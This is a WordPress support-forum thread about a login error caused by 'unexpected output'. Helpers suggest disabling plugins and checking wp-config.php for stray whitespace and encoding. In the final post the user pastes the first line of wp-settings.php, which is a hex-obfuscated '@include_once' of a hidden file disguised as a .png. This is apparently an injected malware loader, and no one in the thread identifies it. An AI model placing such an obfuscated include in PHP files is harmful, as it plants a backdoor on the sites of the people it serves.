Support » Fixing WordPress » Can’t login to WordPress using wp-admin ERROR: Cookies are blocked due to

  • I can no longer login into my WordPress web sites using /wp-admin. I am getting the following error message. Can anyone offer some advice about how to troubleshoot or resolve this issue?

    ERROR: Cookies are blocked due to unexpected output. For help, please see this documentation or try the support forums.

    The page I need help with: [log in to see the link]

Viewing 10 replies - 1 through 10 (of 10 total)
  • Hi @voodoo32 Try logging in twice in a row and tell me if it worked? It’s been happening to me too

    I tired logging in twice in a row and even three times but still getting the same error message every time.

    Try to disable all plugin. And if this resolves will test one plugin at a time to find out which one is causing this error. But to do that, you’ll have to have access to server panel.

    Any tips on how to disable one or all plugins using File Manager from my Hostgator control panel? As I cannot access the dashboard

    rename the plugin folder and after doing the log-in it is only to re-Place the previous name (plugins). Doing so, you do not need to move folders

    I tried renaming the plugins folder in the Hostgator control panel, File Manager as suggested but still no success, still getting the same error. I also renamed the folder of the currently active theme but that did not help either.

    before the errors appeared You Made some changes to the wp-config.php? you created wp-config.php manually instead of duplicating and renaming wp-config-sample.php? If the answer is yes, it means that the file was not saved correctly using UTF-8 format. In this case double and rename wp-config-sample.php wp-config.php, make the necessary settings and make sure you saved using UTF-8 format.

    If it still doesn’t solve, check your function file.php has no blank space before tag<?php and make sure it doesn’t close ?> at the end of the line:

    How to fix this problem:

    • Open up wp-config.php
    • Remove any space or anything before the <?php
    • Remove anything after the ?>
    • Make sure the encoding is UTF-8 (Without BOM)

    NOTE:
    Please, before executing these actions back up your wp-config file.php first

    Hi Marco

    Thanks for continuing to help. Normally I never change code in any files for my site or server files. However while doing some troubleshooting about this error I did try to make one change to wp-config.php for one of my sites. It was just to turn debugging on so changed WP_DEBUG from false to true.

    define(‘WP_DEBUG’, false);

    I changed it in File Manager and was careful so I don’t think I corrupted the file and it still shows in utf-8 format. So I don’t think this is the issue. Also I have the same problem for all 4 of my web sites and I definitely never edited wp-config.php for the other 3 sites.

    As for functions.php it seems to be OK, below is first lines of code. no white space before <?php

    <?php
    include_once get_template_directory() . ‘/functions/blackbird-functions.php’;
    $functions_path = get_template_directory() . ‘/functions/’;

    Hi Marco

    I turned on DEBUG in wp-config.php and below are the warning messages I am getting. I noted they originated in wp-settings.php file in line 1. Below I have posted the first line of that file. Do you see an error here in the final bit of code”

    ; ?> <?php

    Is this what you were referring to in your previous post?

    Warning: Cannot modify header information – headers already sent by (output started at /home2/voodoo31/public_html/creative-freelancer.com/wp-settings.php:1) in /home2/voodoo31/public_html/creative-freelancer.com/wp-includes/pluggable.php on line 1251

    Warning: Cannot modify header information – headers already sent by (output started at /home2/voodoo31/public_html/creative-freelancer.com/wp-settings.php:1) in /home2/voodoo31/public_html/creative-freelancer.com/wp-includes/pluggable.php on line 1254

    <?php @include_once “\x2F\x68\x6F\x6D\x652\x2F\x76\x6F\x6F\x64\x6F\x6F31\x2F\x70\x75\x62\x6C\x69\x63_\x68\x74\x6D\x6C\x2F\x63\x72\x65\x61\x74\x69\x76\x65\x2D\x66\x72\x65\x65\x6C\x61\x6E\x63\x65\x72.\x63\x6F\x6D\x2F\x77\x70\x2D\x61\x64\x6D\x69\x6E\x2F\x69\x6D\x61\x67\x65\x73\x2F.15\x63433.\x70\x6E\x67”; ?> <?php
    /*0dea7*/

Viewing 10 replies - 1 through 10 (of 10 total)
  • You must be logged in to reply to this topic.